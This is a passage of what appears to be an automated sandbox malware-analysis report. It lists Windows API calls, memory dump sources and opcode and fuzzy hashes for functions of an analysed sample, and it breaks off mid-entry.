                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                        • String ID:
                                                                        • API String ID: 1206951868-0
                                                                        • Opcode ID: 5ac052120d28e3fcac13b752f3d54e2a8e75136d9aae845c197bd701b11fde06
                                                                        • Instruction ID: 4528235871620c4c42f31ce0ee45c60bb8e5f811216d2e48d0b042f9532b50e7
                                                                        • Opcode Fuzzy Hash: 5ac052120d28e3fcac13b752f3d54e2a8e75136d9aae845c197bd701b11fde06
                                                                        • Instruction Fuzzy Hash: EB414B75920709AFDB34DFB5D8459AFBBF9EFA8300B00852DE956D3614EB309904CB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 012213B4
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 012213C6
                                                                        • _free.LIBCMT ref: 012213D8
                                                                        • _free.LIBCMT ref: 012213EA
                                                                        • _free.LIBCMT ref: 012213FC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 6e9bbf03e33d47cce4eada891363bcafb64e2483be3e7dd4c9e140910a0d0597
                                                                        • Instruction ID: aaeb6a5d2a787217718eb2f8634619473a6ba486ed73ec11fc4acaa8d85b5280
                                                                        • Opcode Fuzzy Hash: 6e9bbf03e33d47cce4eada891363bcafb64e2483be3e7dd4c9e140910a0d0597
                                                                        • Instruction Fuzzy Hash: D4F04F72520216BBD624EF98F089C2A77DAEA207507644D06F71CDB944CA30F8D08A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: *?
                                                                        • API String ID: 269201875-2564092906
                                                                        • Opcode ID: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction ID: 2a910ce40a15b29e9a1477700290c0932de958d82462d6c7eaf9998c4adfc7fe
                                                                        • Opcode Fuzzy Hash: 7496f51c3f35c99317c8ac37739540d6bea978ec628f8cc924bc48588b70b313
                                                                        • Instruction Fuzzy Hash: 8F617C76E1021A9FCB15CFA8C9805EEFBF5FF58310B24816AD925E7304E671AE45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120EE6A
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120EE79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Xinvalid_argumentstd::_
                                                                        • String ID: invalid stoi argument$stoi argument out of range
                                                                        • API String ID: 909987262-1606216832
                                                                        • Opcode ID: a15227c2cf4615b51a7a3d10676f869161a39acb9f3c517b0a1dcd78ead88e88
                                                                        • Instruction ID: bd96bbb8ef7c1de27a0e917745db8357ad5e5997438fc3b5e0074579aa30aebf
                                                                        • Opcode Fuzzy Hash: a15227c2cf4615b51a7a3d10676f869161a39acb9f3c517b0a1dcd78ead88e88
                                                                        • Instruction Fuzzy Hash: 550192B1910319EFDB20EF69CC45BAEBBF8EB25710F508158E51467241DBB45A848BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: d95cfa7b629d679294ad2dbd204bf43d3654c2c630985d2c9f9e9b6901f063ee
                                                                        • Instruction ID: dfccb53717e1ba10008604d113cdc67a4807e9290cb86416cb0a57b9f8340930
                                                                        • Opcode Fuzzy Hash: d95cfa7b629d679294ad2dbd204bf43d3654c2c630985d2c9f9e9b6901f063ee
                                                                        • Instruction Fuzzy Hash: 8B51C072A20207AFEB29CF18D8C1B7A7BE5FF64211F18052DDA0257699E731E980C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(0000011C,?,FDD920DC,00000000), ref: 01204D89
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01204DF0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 01204DF7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcVersion
                                                                        • String ID:
                                                                        • API String ID: 3310240892-0
                                                                        • Opcode ID: 98bae6878c975640662ee2353956ae7df055a7d0f8c148d17c472bff6f3eac2a
                                                                        • Instruction ID: 9a6c97cc8b6680b22bb9623e4703dedb055e16bf332cc9881be6081b6c63612a
                                                                        • Opcode Fuzzy Hash: 98bae6878c975640662ee2353956ae7df055a7d0f8c148d17c472bff6f3eac2a
                                                                        • Instruction Fuzzy Hash: A0516970D242599BDB25FF68DD487EDBBB4EB55310F5083A8E605A72C2EB344E808B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0122509E
                                                                        • _free.LIBCMT ref: 012250C7
                                                                        • SetEndOfFile.KERNEL32(00000000,012225FD,00000000,0121D4F0,?,?,?,?,?,?,?,012225FD,0121D4F0,00000000), ref: 012250F9
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,012225FD,0121D4F0,00000000,?,?,?,?,00000000), ref: 01225115
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 1547350101-0
                                                                        • Opcode ID: d61ea6f7662a3014d43bb0e323ae701f2e7a34ea37256f4c3c17dc17f4ac5139
                                                                        • Instruction ID: fec533a767352e150e3c31d760c1104082d7da7f287368dd2dc3a0cf1ccbe095
                                                                        • Opcode Fuzzy Hash: d61ea6f7662a3014d43bb0e323ae701f2e7a34ea37256f4c3c17dc17f4ac5139
                                                                        • Instruction Fuzzy Hash: BD41DA32920627BBDB11EFAC8C45AED37F5AF68360F288510F624A7295E678C64147A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 0121AE0F: _free.LIBCMT ref: 0121AE1D
                                                                          • Part of subcall function 01220971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,01224B40,?,00000000,00000000), ref: 01220A13
                                                                        • GetLastError.KERNEL32 ref: 0121FA02
                                                                        • __dosmaperr.LIBCMT ref: 0121FA09
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0121FA48
                                                                        • __dosmaperr.LIBCMT ref: 0121FA4F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        • Opcode ID: 107de486ed594d86986ee4e4ade619dabfbc9c9867d2845a297bd9b1c68c0332
                                                                        • Instruction ID: 7ccc03c01f007552b3c04f3add7cdbd1fec1e0ae8a8fcb4403ffcd36a7b6c405
                                                                        • Opcode Fuzzy Hash: 107de486ed594d86986ee4e4ade619dabfbc9c9867d2845a297bd9b1c68c0332
                                                                        • Instruction Fuzzy Hash: 0521C772620207BF9B21EF69898087B77EDEF242647104514E93997249E774ED048790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,?,0121AD8D,00000000,?,?,?,0121AF26,?), ref: 0121DF49
                                                                        • _free.LIBCMT ref: 0121DFA6
                                                                        • _free.LIBCMT ref: 0121DFDC
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0121AF26,?), ref: 0121DFE7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: 12bedc33268aa85661004413620716a10b9250ced4d42ce02d833e0dee5310c7
                                                                        • Instruction ID: 50d49fb74568d92861756df33495b87e9035f902b82f525928a0b2e592e3ab86
                                                                        • Opcode Fuzzy Hash: 12bedc33268aa85661004413620716a10b9250ced4d42ce02d833e0dee5310c7
                                                                        • Instruction Fuzzy Hash: 1811CA7223850FABD721FAF8AC8CD3B15DADBF1574B250224F7649718CDE6089418220
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,0121B7F5,0121DB7F,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121E0A0
                                                                        • _free.LIBCMT ref: 0121E0FD
                                                                        • _free.LIBCMT ref: 0121E133
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01218272,?,?,?,?,?,012020C3,?,?), ref: 0121E13E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        • Opcode ID: bee2f894a4044ca463065a71bcfd1268ddc4cd11a1a9a59c9ea20ff0f6b67f18
                                                                        • Instruction ID: 458ddf843694ba92eae7eb39442349f109edcb4940a435b0f04d1a31cec99391
                                                                        • Opcode Fuzzy Hash: bee2f894a4044ca463065a71bcfd1268ddc4cd11a1a9a59c9ea20ff0f6b67f18
                                                                        • Instruction Fuzzy Hash: A111A9722245076AD733E6B9BC88D7B25DAD7F1674B270324FA24A72CCDEB18C454220
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0121E9E2,00000000,?,0122370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0121E893
                                                                        • GetLastError.KERNEL32(?,0122370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0121E9E2,00000000,00000104,?), ref: 0121E89D
                                                                        • __dosmaperr.LIBCMT ref: 0121E8A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: 069ea89bdc129c4efc31c4ed18ecf410ec777fe5ef9252dc8cec2d5d05ac2b42
                                                                        • Instruction ID: fe04bfee7f97164045d602d5bc80cbb932bae574f0919cb4db90636ac02c27af
                                                                        • Opcode Fuzzy Hash: 069ea89bdc129c4efc31c4ed18ecf410ec777fe5ef9252dc8cec2d5d05ac2b42
                                                                        • Instruction Fuzzy Hash: 60F03632610116BB9B32AFA6DC0C95ABFE9FF642A03174521FE19D6124C771E811D7D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0121E9E2,00000000,?,01223695,00000000,00000000,0121E9E2,?,?,00000000,00000000,00000001), ref: 0121E8FC
                                                                        • GetLastError.KERNEL32(?,01223695,00000000,00000000,0121E9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,0121E9E2,00000000,00000104), ref: 0121E906
                                                                        • __dosmaperr.LIBCMT ref: 0121E90D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: 3316dd55db9d59a57d31e2357c3db4495827c626acaf9432778322bc2b29c7b3
                                                                        • Instruction ID: 29b290943e5b64bbdaa35fb463aa871bd8dab7068549bd302d7dfa97a8a53efe
                                                                        • Opcode Fuzzy Hash: 3316dd55db9d59a57d31e2357c3db4495827c626acaf9432778322bc2b29c7b3
                                                                        • Instruction Fuzzy Hash: 47F06D32210116BB8B329FA6DD0895ABFEAFF642A031A4524FE18D6118C731E811DBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(01205140,0000000F,012368F8,00000000,01205140,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140), ref: 012263A6
                                                                        • GetLastError.KERNEL32(?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000,01205140,?,01223421,01205140), ref: 012263B2
                                                                          • Part of subcall function 01226378: CloseHandle.KERNEL32(FFFFFFFE,012263C2,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000,01205140), ref: 01226388
                                                                        • ___initconout.LIBCMT ref: 012263C2
                                                                          • Part of subcall function 0122633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,01226369,01225A94,01205140,?,01222ECD,00000000,?,01205140,00000000), ref: 0122634D
                                                                        • WriteConsoleW.KERNEL32(01205140,0000000F,012368F8,00000000,?,01225AA7,01205140,00000001,01205140,01205140,?,01222ECD,00000000,?,01205140,00000000), ref: 012263D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: a601b3fb524f75fd27d41a4aaea8102b077b7d9b7078effb29084edf27fa6be2
                                                                        • Instruction ID: 40f8832c9ed1828bad782fe3ac56566ae94f276cfc39d76d5774f779a84530bc
                                                                        • Opcode Fuzzy Hash: a601b3fb524f75fd27d41a4aaea8102b077b7d9b7078effb29084edf27fa6be2
                                                                        • Instruction Fuzzy Hash: D6F03037410275BBCF321F95FC08AAD3F66FB496A1B054010FE18A5220C6328921EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,01217157,00000064), ref: 012171DD
                                                                        • LeaveCriticalSection.KERNEL32(01239708,000000FF,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171E7
                                                                        • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171F8
                                                                        • EnterCriticalSection.KERNEL32(01239708,?,01217157,00000064,?,?,?,01203E30,0123C468,FDD920DC,?,00000000,01228818,000000FF), ref: 012171FF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: 48e23567e5cdb1aa52fde391412093aead030c990d402acd07fa8040c4abd723
                                                                        • Instruction ID: b276bc2d9daf77d3e1600927287c882769e86cd16dc3f54715d412312443f861
                                                                        • Opcode Fuzzy Hash: 48e23567e5cdb1aa52fde391412093aead030c990d402acd07fa8040c4abd723
                                                                        • Instruction Fuzzy Hash: 6FE01271561124BBCE371F51FC0EACD3E55FB5AB65B111020F60566298CBE159809BD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 0121C8C4
                                                                          • Part of subcall function 0121D653: HeapFree.KERNEL32(00000000,00000000,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?), ref: 0121D669
                                                                          • Part of subcall function 0121D653: GetLastError.KERNEL32(?,?,0122142F,?,00000000,?,?,?,01221456,?,00000007,?,?,01221858,?,?), ref: 0121D67B
                                                                        • _free.LIBCMT ref: 0121C8D7
                                                                        • _free.LIBCMT ref: 0121C8E8
                                                                        • _free.LIBCMT ref: 0121C8F9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: ba941da99c208dc46aab12ff908373625b3049d92ab75f84909461eb1ba1e02b
                                                                        • Instruction ID: 5ecec00d1272dde108965d8d9952e0631cbac9172d0b6a2dd1b718d07729823a
                                                                        • Opcode Fuzzy Hash: ba941da99c208dc46aab12ff908373625b3049d92ab75f84909461eb1ba1e02b
                                                                        • Instruction Fuzzy Hash: 27E04F70414262DECB21AF54F84C8997BE1A7B9B547014817E6286321CEA7605D5DB84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -
                                                                        • API String ID: 0-2547889144
                                                                        • Opcode ID: 724313b641268ca241a63825fe3713c7cf57229635aae53ff3b101e4d6d26445
                                                                        • Instruction ID: 1ef737274e2fd6dcda5a5abcaf92c845010a77f762fa1d850e2ce69929d1a91c
                                                                        • Opcode Fuzzy Hash: 724313b641268ca241a63825fe3713c7cf57229635aae53ff3b101e4d6d26445
                                                                        • Instruction Fuzzy Hash: F522BFB4D202599BEF25EB24CD497DDBBB5AB62308F5441D8C409272C6EB750F88CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0120F054
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0120F51E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp, Offset: 01200000, based on PE: true
                                                                        • Associated: 0000000E.00000002.321470676.0000000001200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321590474.000000000122E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321618470.0000000001238000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.321626834.000000000123D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1200000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTempXinvalid_argumentstd::_
                                                                        • String ID: invalid stoi argument$stoi argument out of range
                                                                        • API String ID: 3948722134-1606216832
                                                                        • Opcode ID: 849d287790c77d23fb8f8e6afdfb98757128ae9aa48655b9eea1e64dd1001344
